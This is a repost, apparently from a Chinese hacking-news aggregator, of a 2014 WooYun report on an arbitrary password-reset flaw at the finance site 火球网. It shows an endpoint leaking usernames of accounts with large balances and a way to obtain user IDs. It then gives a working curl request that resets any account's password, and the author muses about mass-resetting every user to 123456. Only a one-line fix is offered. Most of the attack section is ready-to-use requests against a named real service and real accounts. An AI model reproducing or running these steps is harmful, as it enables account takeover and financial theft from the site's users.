记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

火球网任意用户密码重置漏洞附官方百万余额账户演示

2014-12-20 18:01

该重置密码接口需要一个用户唯一编号,由于火球网整个架构基本都不涉及这个参数,找了好些时间才发现这玩意儿!

先说登陆,我们有了用户邮箱(这里不一定是邮箱,测试的结果发现用户登录的用户名是唯一的)和密码才能登陆。

走吧,跟我一起去瞅瞅百万余额账户,也变土豪了?



#0 寻找用户名(登陆处使用)

code 区域
接口地址:

https://www.huoqiu.cn//plan/ranklist.json

{"ranklist":[{"totalSum":2000000.00,"nick":"xkbear"},{"totalSum":1300000.00,"nick":"jian***@huoqiur.com"},{"totalSum":1100000,"nick":"风卷残云"},{"totalSum":502032.00,"nick":"3388"},{"totalSum":500000.00,"nick":"Luna"},{"totalSum":500000.00,"nick":"18858"},{"totalSum":395451.00,"nick":"眼界投资"},{"totalSum":354003.00,"nick":"Jun_otakugame"},{"totalSum":348001.00,"nick":"huoqiu_tesla"},{"totalSum":340760.00,"nick":"forreach"},{"totalSum":333489.00,"nick":"6lay"}],"success":true}

登陆用户名泄露(这里有个土豪邮箱jian***@huoqiur.com,仅猜测为登陆用户名,将在下边证实)。





#1 寻找用户唯一编号(重置密码需要)

code 区域
相关地址:

https://www.huoqiu.cn/asks/257.html

问答模块->赞同

问答模块->取消赞同(服务器将回该用户详细数据,我获取到的是22603,不做演示)





#2 重置用户接口

code 区域
接口地址:

https://www.huoqiu.cn/login/reset_password.json



所需必要POST参数三个:

id=22603&password=123456&passwordRepeated=123456

参数解释:

id->用户唯一编号

password->用户新密码

passwordRepeated->确认密码



curl "https://www.huoqiu.cn/login/reset_password.json" -H "Cookie: JSESSIONID=1EF802698A1816E34026FD50FC92A4B0;" -H "CSRFToken: dc8b11a8-73b0-45a8-b33e-0837e763193f" --data "id=22603&password=123456&passwordRepeated=123456"



如重置成功,服务器将返回:{"success":true}







最后想说。。。如果哪位将有序的用户编号全遍历一遍,然后把全站用户密码改为123456。。。哎,又猥琐了一把!

漏洞证明:

050056527c69a02d92c597669045ccbaf47b03a2.jpg



0500570491dbcf97210ca16c8290f471a740d13f.jpg



05005718d9f47b58a227a2faa054d9be04e32ba8.jpg

修复方案:

邮箱验证的rand随机码利用起来

知识来源: www.wooyun.org/bugs/wooyun-2014-082047

阅读:90857 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“火球网任意用户密码重置漏洞附官方百万余额账户演示”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云